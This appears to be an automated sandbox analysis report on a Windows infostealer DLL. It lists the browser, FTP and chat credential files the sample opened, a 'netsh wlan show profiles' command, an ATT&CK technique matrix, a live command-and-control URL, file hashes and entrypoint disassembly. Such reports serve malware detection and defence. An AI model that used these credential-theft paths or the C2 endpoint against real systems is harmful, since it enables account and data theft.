    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

    Lowering of HIPS / PFW / Operating System Security Settings

    Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

    Stealing of Sensitive Information

    Source: Yara match File source: cred64.dll.dll, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\ZzdeyBaIYtaciMeJGbqNHncTELgaiJWqsMZLRUmLSKq\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 2 Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | 1 Credentials In Files | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
    Behavior Graph (ID: 1579621; Sample: cred64.dll.exe; Startdate: 23/12/2024; Architecture: WINDOWS; Score: 100)
    Process tree shown in the graph: loaddll64.exe starts rundll32.exe (several instances), cmd.exe and 3 other processes; the rundll32.exe instances each start powershell.exe and netsh.exe (each with a conhost.exe child).
    Dropped file shown in the graph: C:\Users\user\...\246122658369_Desktop.zip (Zip), dropped by powershell.exe.
    Network endpoint shown in the graph: 212.193.31.8, ports 49730, 49731, 49732 (SPD-NETTR, Russian Federation), contacted by rundll32.exe.

    Source | Detection | Scanner | Label
    cred64.dll.dll | 37% | ReversingLabs | Win64.Infostealer.Tinba
    cred64.dll.dll | 39% | Virustotal |
    No Antivirus matches
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    http://212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1 | true | | unknown
    http://212.193.31.8/3ofn3jf3e2ljk2/index.php | true | | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    212.193.31.8 | unknown | Russian Federation | 57844 | SPD-NETTR | true
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1579621
                                                                      Start date and time:2024-12-23 06:37:06 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 4m 44s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:23
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:cred64.dll.dll
                                                                      (renamed file extension from exe to dll)
                                                                      Original Sample Name:cred64.dll.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.phis.troj.spyw.evad.winDLL@32/18@0/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 67%
                                                                      • Number of executed functions: 3
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Stop behavior analysis, all processes terminated
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 6276 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    Time | Type | Description
    00:38:06 | API Interceptor | 1x Sleep call for process: loaddll64.exe modified
    00:38:25 | API Interceptor | 58x Sleep call for process: powershell.exe modified
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    212.193.31.8 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 212.193.31.8/3ofn3jf3e2ljk2/index.php
     | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8/3ofn3jf3e2ljk2/index.php
     | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8/3ofn3jf3e2ljk2/index.php
     | 6X4odkIkyK.exe | malicious | Amadey | 212.193.31.8/3ofn3jf3e2ljk2/index.php
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    fp2e7a.wpc.phicdn.net | tg.exe | malicious | Babadeda | 192.229.221.95
     | iepdf32.dll | malicious | Unknown | 192.229.221.95
     | Support.Client.exe | malicious | ScreenConnect Tool | 192.229.221.95
     | 62f928.msi | malicious | Remcos | 192.229.221.95
     | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar, Xmrig | 192.229.221.95
     | P0RN-vidz.Client.exe | malicious | ScreenConnect Tool | 192.229.221.95
     | uDTW3VjJJT.exe | malicious | LummaC, Stealc | 192.229.221.95
     | f4p4BwljZt.exe | malicious | LummaC | 192.229.221.95
     | Qmg24kMXxU.exe | malicious | LummaC, Stealc | 192.229.221.95
     | hesaphareketi-20-12-2024-pdf.exe | malicious | AgentTesla | 192.229.221.95
    Match | Associated Sample Name / URL | Detection | Threat Name | Context
    SPD-NETTR | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 212.193.31.8
     | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8
     | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8
     | 6X4odkIkyK.exe | malicious | Amadey | 212.193.31.8
     | mips.elf | malicious | Mirai | 185.72.8.231
     | ppc.elf | malicious | Mirai | 185.72.8.231
     | nshkmpsl.elf | malicious | Mirai | 185.72.8.231
     | mipsel.nn.elf | malicious | Mirai, Okiru | 2.58.124.230
     | 63Blg3Psdt.exe | malicious | DCRat | 185.118.143.220
     | https://vmehy.daxizzobui.top/ | malicious | Unknown | 195.133.45.183
                                                                      No context
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):3084
                                                                      Entropy (8bit):7.73805150023226
                                                                      Encrypted:false
                                                                      SSDEEP:96:zBPwzYgAqR7kZSYsntEZSYsntGu/cNzrCQ:zBPwzYgsZS0ZS22cNzD
                                                                      MD5:AF594BEB9BB0CB2510C0816B2F502F05
                                                                      SHA1:DD4C7398AAF17CE5308FF52B57CAD4CC327243A3
                                                                      SHA-256:C565E96C12DE909D97B26655C352C08EC71C7C41567928E83BBEE4E8D27D42AB
                                                                      SHA-512:36E38E537DE2D8901573DD238440441C0D77772C2A0A5C5F1E4AD5431FE7F2F47FE27EAC698EAF2FB8627FC872E5688641F934FC036D561534EB75B3BA3C9770
                                                                      Malicious:true
                                                                      Preview:PK........T@DW..............._Files_\DVWHKMNFNN.docx..Ir@!.D....?....p...l....aeA..K...E.....[.ph..kQ..T..j.uUnVT.$U...K7+}lZ..I.](.X..5b>..M.".uSl....u....|.c..'}.U ....2.'....U0A..*qO..v.9X.Z...n.E}....us..,]...[g.:..-...6:_.PK...H...=..P...q....).@d^..Ou..W.S.=.....d..[!..L...rr]C.M&S.E}.e:>K.[...U.......;.F.Z.vW.6.,.r.[...hh;......\.Cm.p......-_..d..Q.. .i.6..J..........|.C.Dp.....).....o8.,...SV..2\$p.eNG......^.(-....7...RA.j......q..U;...<#VZ.Ut...6......h.........2.Kf......j8.......>W...u...4..d..z.>...s..9.p.Q.)...t<...`.m..R.(.|w.!.....J.y.]j...-......[.-{3..W.=..\.M<O..$...}...G.;n..N.......w.W...f..$.y.$jw...N7..=:.....K..=..."[?2....PK........T@DW/1............._Files_\LTKMYBSEYZ.docx.SI.E!..w.?.....Y...vE..M...tt.sO\...i..BI.T|..rp..d.d.i..}C.s|.@^mn..\.U..h..z....).>.q....?.= ..}E..(.Yb.s.:..c....."...~.3..y.....g....k.(..."........q9&a..>.!.S.>..a?'..b....:.....}...P+..-.........=.|...T..Z.ri..1....r.|..?w.
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.694985340190863
                                                                      Encrypted:false
                                                                      SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                      MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                      SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                      SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                      SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.687722658485212
                                                                      Encrypted:false
                                                                      SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                      MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                      SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                      SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                      SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.688284131239007
                                                                      Encrypted:false
                                                                      SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                      MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                      SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                      SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                      SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                      Entropy (8bit):6.466732826613367
                                                                      TrID:
                                                                      • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                      • Win64 Executable (generic) (12005/4) 10.17%
                                                                      • Generic Win/DOS Executable (2004/3) 1.70%
                                                                      • DOS Executable Generic (2002/1) 1.70%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                      File name:cred64.dll.dll
                                                                      File size:1'281'024 bytes
                                                                      MD5:d862c12a4467ebae581a8c0cc3ea2211
                                                                      SHA1:9e797375b9b4422b2314d3e372628643ccf1c5db
                                                                      SHA256:47f8a270b27c18bab9013f4a8f0ee6e877e4050bd4018d682eb502bcfd5bff6d
                                                                      SHA512:cf6545df4a244bb7dc699a565759f97c759ba19bcc9ad9ad91a20cd07aee19cbe10eb82dd21416b717581b34dc4f24ba6d43a00e7d8018b8be133dbbc9e8113c
                                                                      SSDEEP:24576:MO/VvL5QafhQsnoXyaoMferXQ5rnxQBuLv8Y4JKMfUO9l:Z5nfhQzOMoA5rnxHv8PKre
                                                                      TLSH:C0557C0BA36141BCD4BBE1789A175A47F775704603709AEB07E446AA3F13BE19EBE310
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D................................s.............................................................X.............Rich...........
                                                                      Icon Hash:7ae282899bbab082
                                                                      Entrypoint:0x1800cfac4
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x180000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x676432F7 [Thu Dec 19 14:51:35 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:3f175edea93fa7a76a78004d12de2235
                                                                      Instruction
                                                                      dec eax
                                                                      mov dword ptr [esp+08h], ebx
                                                                      dec eax
                                                                      mov dword ptr [esp+10h], esi
                                                                      push edi
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      dec ecx
                                                                      mov edi, eax
                                                                      mov ebx, edx
                                                                      dec eax
                                                                      mov esi, ecx
                                                                      cmp edx, 01h
                                                                      jne 00007F0859044C47h
                                                                      call 00007F0859044FA8h
                                                                      dec esp
                                                                      mov eax, edi
                                                                      mov edx, ebx
                                                                      dec eax
                                                                      mov ecx, esi
                                                                      dec eax
                                                                      mov ebx, dword ptr [esp+30h]
                                                                      dec eax
                                                                      mov esi, dword ptr [esp+38h]
                                                                      dec eax
                                                                      add esp, 20h
                                                                      pop edi
                                                                      jmp 00007F0859044AD4h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      and dword ptr [ecx+10h], 00000000h
                                                                      dec eax
                                                                      lea eax, dword ptr [0002F048h]
                                                                      dec eax
                                                                      mov dword ptr [ecx+08h], eax
                                                                      dec eax
                                                                      lea eax, dword ptr [0002F02Dh]
                                                                      dec eax
                                                                      mov dword ptr [ecx], eax
                                                                      dec eax
                                                                      mov eax, ecx
                                                                      ret
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 48h
                                                                      dec eax
                                                                      lea ecx, dword ptr [esp+20h]
                                                                      call 00007F0859044C17h
                                                                      dec eax
                                                                      lea edx, dword ptr [00057E87h]
                                                                      dec eax
                                                                      lea ecx, dword ptr [esp+20h]
